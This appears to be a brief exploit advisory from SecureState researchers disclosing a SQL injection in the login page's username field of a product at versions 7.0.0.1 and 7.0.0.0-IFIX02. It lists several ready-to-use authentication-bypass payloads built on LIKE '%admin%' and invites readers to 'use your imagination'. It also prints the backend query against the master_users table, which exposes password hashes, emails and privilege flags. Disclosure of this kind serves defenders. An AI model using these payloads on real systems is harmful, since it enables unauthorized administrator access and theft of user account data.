+==============================================================+
SecureState
sasquatch - [email protected]
rel1k - [email protected]
The username field on the login page is where the application is susceptible to SQL injection…
' OR login_name LIKE '%admin%'–
(other variations work as well)
' OR login_name LIKE 'admin%'–
' OR LOWER(login_name) LIKE '%admin%'–
' OR LOWER(login_name) LIKE 'admin%'–
etc…use your imagination…
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE